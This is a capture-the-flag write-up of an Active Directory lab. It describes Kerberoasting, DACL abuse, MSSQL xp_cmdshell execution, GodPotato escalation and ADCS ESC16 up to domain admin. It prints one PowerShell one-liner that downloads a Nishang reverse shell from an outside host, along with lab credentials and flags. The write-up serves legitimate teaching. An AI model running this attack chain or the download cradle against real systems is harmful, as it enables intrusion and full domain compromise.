Here’s a writeup for the Nexus Breach challenge I created for the Final of the Midnight Flag CTF (2025 edition).
I really enjoyed organizing this CTF, we had a great staff team and this edition was clearly a success. Unfortunately, this challenge had to be removed after 2 hours of the CTF because of interference with another challenge :/
Hope you’ll still learn a few things from this writeup, a huge thanks to Klemou for testing it.

Initial Access : Forensic & Blind Kerberoasting

1
2
3
4
5

nxc smb 10.2.10.0/24
SMB         10.2.10.10        445    NEURATEK-DC        [*] Windows Server 2022 Build 20348 x64 (name:NEURATEK-DC) (domain:neuratek.corp) (signing:True) (SMBv1:False)
SMB         10.2.10.11        445    SRV1               [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:neuratek.corp) (signing:False) (SMBv1:False)
SMB         10.2.10.12        445    NEXUSDB            [*] Windows Server 2022 Build 20348 x64 (name:NEXUSDB) (domain:neuratek.corp) (signing:False) (SMBv1:False)
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

We start by finding an FTP shared folder (with default creds) on SRV1, which contains EVTX logs.

Nothing really interesting in the logs, we can parse them with Chainsaw and filters to get a list of usernames.

There’s also a message.txt in the zip file, which mentions a svc_nexus account, so we add it to our usernames list too.
Now we can try a classic AS-REP Roasting attack.

Unfortunately, we can’t crack this hash :/
BUT, there’s a very cool trick spotted by Charlie Cark in 2022, which allows to conduct a Kerberoasting attack by providing a user who doesn’t have the pre-authentication required (more details here).

It worked! Now we can crack this with Hashcat and the rockyou wordlist, and grab the svc_nexus password: 8640nexuscyborg.
We can get the first flag on this user’s desktop: MCTF{K3RbeRo@$TinG_In_7he_DarK}

Various DACLs abuse and MSSQL exploitation

This step will be quite easy for HTB players, we have a DACL chain which ends by a ReadGMSAPassword attribute. We can enumerate this with BloodHound (Community Edition, cuz we’re in 2025 :) )

I recommend reading this very good article if you aren’t familiar with these attributes. Basically, a Group Managed Service Account (gMSA) is a Microsoft feature that creates and automatically renews strong passwords for service accounts.
So, let’s get our hands dirty and start compromising the first account via GenericWrite. For this, we’ll use Shadow Credentials, which is the easiest and stealthiest method in my opinion.

Now we move on from the rneon account, and we use the same method for the GenericAll attribute on vlynx.

Next step is a bit longer, we have a WriteOwner permission on the DB Managers group, so we have to give us owner permissions on this group, then FullControl rights, and then we can add ourselves to the group.



Done! Now we can grab the gMSA password hash of the MSSQL account, which can be done with ldeep or NetExec.

Next step is a classic MSSQL compromise, if you’re not familiar with this you’ll discover some cool stuff you can do with MSSQL.
Impacket provides a great tool for interacting with (and pwning) this.

Ok this was quick. Basically, on the screenshot above we found that our gMSA-MSSQL$ service account has an impersonation right on the admin, which allows us to execute queries as the admin user. This user is a sysadmin, which means it can enable xp_cmdshell, a very cool (or not, depending on your point of view) feature which allows the user to run cmd commands on the MSSQL server.
So we end up running a powershell one-liner, created like this on a Linux machine (in this case to host a Nishang reverse shell):

1

echo -n "IEX(New-Object Net.WebClient).downloadString('http://198.51.100.2/nishang.ps1')" | iconv -t UTF-16LE | base64 -w 0

Now we get an RCE on the server as the nt service\mssqlserver, which has the SeImpersonatePrivilege permission by default.

We can use GodPotato to abuse this privilege and elevate our access to nt authority\system


Finally, we can loot the local admin hash, to have a more comfortable access & maintain persistence.

We can get the second flag on the Administrator’s desktop: MCTF{dACl_DaNCE_t0_Ms$Ql_PWn}.
This whole step could also be done by using NTLM Reflection, congrats to @rayanlecat for spotting this unattended path. Fortunately for me, Windows Server 2022 enforces SMB Signing on the Domain Controllers, so it could only be used for this step.

Domain admin escalation via ESC16

What to do when you become local admin of a Windows machine? Loot it, of course!
In our case, looting the DPAPI can be quite interesting.

Here we get access to the lstorm account which is part of the CA Operators group, and has a GenericWrite permission over another user of this group.

Hmm this is interesting, we should check the ADCS with certipy (I hope yours is up-to-date).

Nice! According to this or this, we should be able to abuse this vulnerability and get a Domain Admin access.
Basically, ESC16 occurs when the CA is configured to disable the inclusion of the szOID_NTDS_CA_SECURITY_EXT security extension (which is vital for strong certificate mapping) in all the certificate it issues. Its OID (1.3.6.1.4.1.311.25.2) is disabled on this CA according to the previous screenshot, which means it is vulnerable to ESC16 if combined with the GenericWrite permission on pquartz.
Let’s check the lstorm’s UPN and change it to Administrator to abuse this account. We’ll also need pquartz’s NT hash to request a certificate.

We can now request the User certificate, with the fake UPN on pquartz to authenticate as a Domain Admin.
Pwned! Now we can dump the NTDS hashes and submit the NT hash of the krbtgt account as the last flag: MCTF{4d1e6b77f595d49aa49a9aaf375e2d8b}